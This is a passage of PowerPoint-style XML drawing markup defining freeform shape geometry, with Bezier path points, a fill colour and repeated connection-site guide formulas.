                    <a:pt x="1670104" y="1558748"/>
                    <a:pt x="1654227" y="1554778"/>
                    <a:pt x="1639231" y="1548163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625118" y="1543311"/>
                    <a:pt x="1612769" y="1536696"/>
                    <a:pt x="1602625" y="1525228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1593804" y="1515085"/>
                    <a:pt x="1589835" y="1520377"/>
                    <a:pt x="1587189" y="1530080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1584543" y="1538901"/>
                    <a:pt x="1583220" y="1547722"/>
                    <a:pt x="1580132" y="1556542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574399" y="1573743"/>
                    <a:pt x="1566460" y="1577712"/>
                    <a:pt x="1549700" y="1571538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1527648" y="1563158"/>
                    <a:pt x="1510889" y="1546839"/>
                    <a:pt x="1496335" y="1528757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1467667" y="1493473"/>
                    <a:pt x="1441205" y="1456426"/>
                    <a:pt x="1415183" y="1418938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1379900" y="1367777"/>
                    <a:pt x="1346381" y="1314853"/>
                    <a:pt x="1309775" y="1264133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1303600" y="1255753"/>
                    <a:pt x="1297867" y="1247373"/>
                    <a:pt x="1289928" y="1240317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1244942" y="1200182"/>
                    <a:pt x="1215833" y="1150786"/>
                    <a:pt x="1193340" y="1095215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1169524" y="1035674"/>
                    <a:pt x="1141739" y="977457"/>
                    <a:pt x="1110425" y="921445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1106014" y="913506"/>
                    <a:pt x="1101604" y="905567"/>
                    <a:pt x="1096753" y="894541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1097635" y="936881"/>
                    <a:pt x="1100722" y="976134"/>
                    <a:pt x="1105132" y="1015386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1112189" y="1078014"/>
                    <a:pt x="1110425" y="1141083"/>
                    <a:pt x="1112189" y="1204152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1113512" y="1257958"/>
                    <a:pt x="1115276" y="1311765"/>
                    <a:pt x="1122774" y="1365131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1127184" y="1395122"/>
                    <a:pt x="1133800" y="1424671"/>
                    <a:pt x="1149236" y="1451134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1165114" y="1478037"/>
                    <a:pt x="1174376" y="1507587"/>
                    <a:pt x="1177463" y="1538901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1178345" y="1549486"/>
                    <a:pt x="1184079" y="1558306"/>
                    <a:pt x="1189812" y="1566686"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1258173" y="1673418"/>
                    <a:pt x="1326975" y="1779708"/>
                    <a:pt x="1390485" y="1889086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1405039" y="1914226"/>
                    <a:pt x="1418271" y="1940247"/>
                    <a:pt x="1433707" y="1964945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1465462" y="2017429"/>
                    <a:pt x="1474283" y="2075205"/>
                    <a:pt x="1479134" y="2135186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486632" y="2228687"/>
                    <a:pt x="1490601" y="2322187"/>
                    <a:pt x="1496335" y="2416129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1498540" y="2450089"/>
                    <a:pt x="1498981" y="2484049"/>
                    <a:pt x="1499863" y="2517568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501186" y="2584165"/>
                    <a:pt x="1504273" y="2650762"/>
                    <a:pt x="1503832" y="2717359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1503391" y="2813065"/>
                    <a:pt x="1500745" y="2908770"/>
                    <a:pt x="1484427" y="3003153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1482662" y="3014620"/>
                    <a:pt x="1483545" y="3026087"/>
                    <a:pt x="1481339" y="3037554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1476488" y="3063575"/>
                    <a:pt x="1476929" y="3087832"/>
                    <a:pt x="1495452" y="3109443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1502509" y="3117382"/>
                    <a:pt x="1508684" y="3126644"/>
                    <a:pt x="1514417" y="3135906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1539556" y="3175599"/>
                    <a:pt x="1576604" y="3199416"/>
                    <a:pt x="1619385" y="3215734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1634821" y="3221468"/>
                    <a:pt x="1650257" y="3225437"/>
                    <a:pt x="1667017" y="3225437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689069" y="3224996"/>
                    <a:pt x="1706711" y="3235140"/>
                    <a:pt x="1720383" y="3251899"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1731409" y="3265572"/>
                    <a:pt x="1741994" y="3279685"/>
                    <a:pt x="1752138" y="3293798"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1764487" y="3310557"/>
                    <a:pt x="1760517" y="3322907"/>
                    <a:pt x="1741553" y="3331286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1734496" y="3334374"/>
                    <a:pt x="1726557" y="3336138"/>
                    <a:pt x="1719060" y="3337902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1689951" y="3343635"/>
                    <a:pt x="1660401" y="3346723"/>
                    <a:pt x="1631734" y="3355103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1611005" y="3360836"/>
                    <a:pt x="1589394" y="3355103"/>
                    <a:pt x="1568665" y="3352897"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1461934" y="3340548"/>
                    <a:pt x="1356525" y="3321583"/>
                    <a:pt x="1255086" y="3286300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1231711" y="3278362"/>
                    <a:pt x="1208777" y="3268218"/>
                    <a:pt x="1187166" y="3255869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1153206" y="3236904"/>
                    <a:pt x="1143503" y="3215293"/>
                    <a:pt x="1151001" y="3177364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1152765" y="3168543"/>
                    <a:pt x="1154529" y="3159281"/>
                    <a:pt x="1157616" y="3150901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1162467" y="3138552"/>
                    <a:pt x="1164232" y="3127085"/>
                    <a:pt x="1159821" y="3113854"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1155852" y="3101946"/>
                    <a:pt x="1159821" y="3090038"/>
                    <a:pt x="1163791" y="3078130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1167319" y="3067104"/>
                    <a:pt x="1170406" y="3056078"/>
                    <a:pt x="1173053" y="3045052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1192017" y="2957285"/>
                    <a:pt x="1204366" y="2868636"/>
                    <a:pt x="1216274" y="2779546"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1225977" y="2708979"/>
                    <a:pt x="1234357" y="2637972"/>
                    <a:pt x="1240532" y="2566524"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1244501" y="2523743"/>
                    <a:pt x="1244942" y="2482285"/>
                    <a:pt x="1229064" y="2439945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1186725" y="2326598"/>
                    <a:pt x="1149236" y="2211045"/>
                    <a:pt x="1100281" y="2100344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1088373" y="2073000"/>
                    <a:pt x="1074701" y="2046537"/>
                    <a:pt x="1060587" y="2020516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1051326" y="2003316"/>
                    <a:pt x="1038535" y="1989202"/>
                    <a:pt x="1023099" y="1976853"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="986052" y="1947304"/>
                    <a:pt x="955179" y="1911579"/>
                    <a:pt x="921219" y="1878501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="902254" y="1859978"/>
                    <a:pt x="881966" y="1842336"/>
                    <a:pt x="860796" y="1826018"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855063" y="1821607"/>
                    <a:pt x="848888" y="1817638"/>
                    <a:pt x="842714" y="1814109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="814487" y="1798673"/>
                    <a:pt x="797728" y="1802201"/>
                    <a:pt x="779204" y="1829105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="748772" y="1873209"/>
                    <a:pt x="727161" y="1922164"/>
                    <a:pt x="704227" y="1970238"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="659682" y="2065502"/>
                    <a:pt x="619106" y="2162972"/>
                    <a:pt x="584705" y="2262647"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572797" y="2296607"/>
                    <a:pt x="566623" y="2331890"/>
                    <a:pt x="559125" y="2366732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="543248" y="2438181"/>
                    <a:pt x="524283" y="2508747"/>
                    <a:pt x="489882" y="2574462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462978" y="2626064"/>
                    <a:pt x="448424" y="2682958"/>
                    <a:pt x="431223" y="2738529"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408730" y="2813506"/>
                    <a:pt x="386678" y="2888483"/>
                    <a:pt x="369037" y="2964341"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363303" y="2989481"/>
                    <a:pt x="363303" y="3014620"/>
                    <a:pt x="358893" y="3039759"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354042" y="3050785"/>
                    <a:pt x="346103" y="3057401"/>
                    <a:pt x="334195" y="3057842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320523" y="3058283"/>
                    <a:pt x="316112" y="3067104"/>
                    <a:pt x="316553" y="3078130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316994" y="3103269"/>
                    <a:pt x="316553" y="3128849"/>
                    <a:pt x="329343" y="3152224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337723" y="3167661"/>
                    <a:pt x="345221" y="3183538"/>
                    <a:pt x="349190" y="3200739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354483" y="3224996"/>
                    <a:pt x="346544" y="3236463"/>
                    <a:pt x="322287" y="3239991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275095" y="3246607"/>
                    <a:pt x="227463" y="3252781"/>
                    <a:pt x="179390" y="3251017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167041" y="3250576"/>
                    <a:pt x="155133" y="3249694"/>
                    <a:pt x="143666" y="3245725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124701" y="3239550"/>
                    <a:pt x="112793" y="3227642"/>
                    <a:pt x="109264" y="3207795"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105736" y="3187508"/>
                    <a:pt x="101326" y="3167661"/>
                    <a:pt x="97356" y="3147373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92064" y="3106797"/>
                    <a:pt x="105736" y="3068427"/>
                    <a:pt x="151163" y="3036672"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="232021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C23E5E-EECC-49ED-9E9B-5A4F4A9B35F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2247230" y="2515673"/>
              <a:ext cx="2685695" cy="1730535"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1928758"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 1928758"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 1928758"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 1928758"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 1928758"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 1928758"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 1922493 w 1928758"/>
                <a:gd name="connsiteY6" fmla="*/ 235160 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 1908820 w 1928758"/>
                <a:gd name="connsiteY7" fmla="*/ 259858 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 1928758"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 1928758"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 1928758"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 1928758"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 1928758"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 1928758"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 1928758"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 1928758"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 1928758"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 1928758"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 1928758"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 1928758"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 1928758"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2298248"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2298248"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2298248"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2298248"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2298248"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2298248"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 1922493 w 2298248"/>
                <a:gd name="connsiteY6" fmla="*/ 235160 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2297708 w 2298248"/>
                <a:gd name="connsiteY7" fmla="*/ 409956 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2298248"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2298248"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2298248"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2298248"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2298248"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2298248"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2298248"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2298248"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2298248"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2298248"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2298248"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2298248"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2298248"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2352745"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2352745"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2352745"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2352745"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2352745"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2352745"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2315930 w 2352745"/>
                <a:gd name="connsiteY6" fmla="*/ 403451 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2297708 w 2352745"/>
                <a:gd name="connsiteY7" fmla="*/ 409956 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2352745"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2352745"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2352745"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2352745"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2352745"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2352745"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2352745"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2352745"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2352745"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2352745"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2352745"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2352745"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2352745"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2679937"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2679937"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2679937"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2679937"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2679937"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2679937"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2315930 w 2679937"/>
                <a:gd name="connsiteY6" fmla="*/ 403451 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2664146 w 2679937"/>
                <a:gd name="connsiteY7" fmla="*/ 560842 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2679937"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2679937"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2679937"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2679937"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2679937"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2679937"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2679937"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2679937"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2679937"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2679937"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2679937"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2679937"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2679937"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2664483"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2664483"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2664483"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2664483"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2664483"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2664483"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2315930 w 2664483"/>
                <a:gd name="connsiteY6" fmla="*/ 403451 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2664146 w 2664483"/>
                <a:gd name="connsiteY7" fmla="*/ 560842 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2664483"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2664483"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2664483"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2664483"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2664483"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2664483"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2664483"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2664483"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2664483"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2664483"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2664483"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2664483"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2664483"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2664782"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2664782"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2664782"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2664782"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2664782"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2664782"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2315930 w 2664782"/>
                <a:gd name="connsiteY6" fmla="*/ 403451 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2664146 w 2664782"/>
                <a:gd name="connsiteY7" fmla="*/ 560842 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2664782"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2664782"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2664782"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2664782"/>
